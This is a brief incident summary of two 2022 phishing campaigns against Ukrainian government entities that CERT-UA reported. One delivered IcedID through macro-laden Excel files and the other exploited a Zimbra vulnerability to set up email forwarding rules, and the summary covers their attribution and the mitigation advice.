Cyber Incident Victim: Computer Emergency Response Team of Ukraine

On April 14, 2022, the Computer Emergency Response Team of Ukraine (CERT-UA) identified two distinct cyber campaigns targeting Ukrainian government entities. The first attack involved phishing emails distributing malicious Excel documents titled "Mobilization Register.xls," which contained macros designed to download and execute IcedID malware, also known as BankBot. IcedID functioned as a modular banking trojan capable of harvesting credentials or deploying additional payloads for extended network compromise. CERT-UA attributed this campaign with moderate confidence to the threat cluster UAC-0041, an actor previously associated with distributing AgentTesla malware. The second campaign utilized emails carrying malicious JPG attachments that exploited CVE-2018-6882, a vulnerability in the Zimbra email collaboration platform, to establish unauthorized email forwarding rules. This technique aimed to intercept sensitive communications for espionage purposes. CERT-UA assigned this activity to a previously unidentified threat group designated UAC-0097.

Both operations sought unauthorized access to internal government networks to conduct cyber-espionage against critical Ukrainian agencies. The IcedID campaign leveraged social engineering tactics by using a document name suggesting military mobilization relevance, while the Zimbra exploit capitalized on unpatched vulnerabilities to manipulate email traffic silently. CERT-UA confirmed the objectives centered on persistent network infiltration for intelligence gathering rather than disruptive attacks. In response to the Zimbra exploitation, CERT-UA issued guidance advising organizations to apply security updates to mitigate CVE-2018-6882. The incidents exemplified ongoing malicious cyber operations against Ukrainian infrastructure during the 2022 conflict, with attribution assessments reflecting varying confidence levels based on tactical overlaps with historical threat actor patterns.